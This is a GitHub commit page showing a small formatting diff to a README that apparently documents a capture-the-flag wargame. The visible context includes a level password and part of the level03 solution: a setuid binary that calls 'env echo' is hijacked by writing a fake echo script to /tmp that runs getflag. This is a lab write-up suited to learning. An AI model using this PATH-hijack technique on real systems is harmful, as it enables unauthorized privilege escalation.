Skip to content

Commit

Permalink
show READMEs daily
Browse files Browse the repository at this point in the history
  • Loading branch information
nuoxoxo committed Nov 16, 2024
1 parent e685965 commit 498af33
Showing 1 changed file with 4 additions and 3 deletions.
7 changes: 4 additions & 3 deletions README.mdx
Original file line number Diff line number Diff line change
Expand Up @@ -186,8 +186,9 @@ Password: ft_waNDReL0L

# 03

- inspect
- available actions - `file` `readelf` `strings` :❌ `ltrace`
- Inspect
-`file` `readelf` `strings`
-`ltrace`
```b
> ls -l
-rwsr-sr-x 1 flag03 level03 8627 level03
Expand Down Expand Up @@ -219,7 +220,7 @@ system("/usr/bin/env echo Exploit me" ...
getflag: /bin/getflag
```

- solution
- Solution

```b
> echo -e "#\!/bin/bash\n/bin/getflag" > /tmp/echo
Expand Down

0 comments on commit 498af33

Please sign in to comment.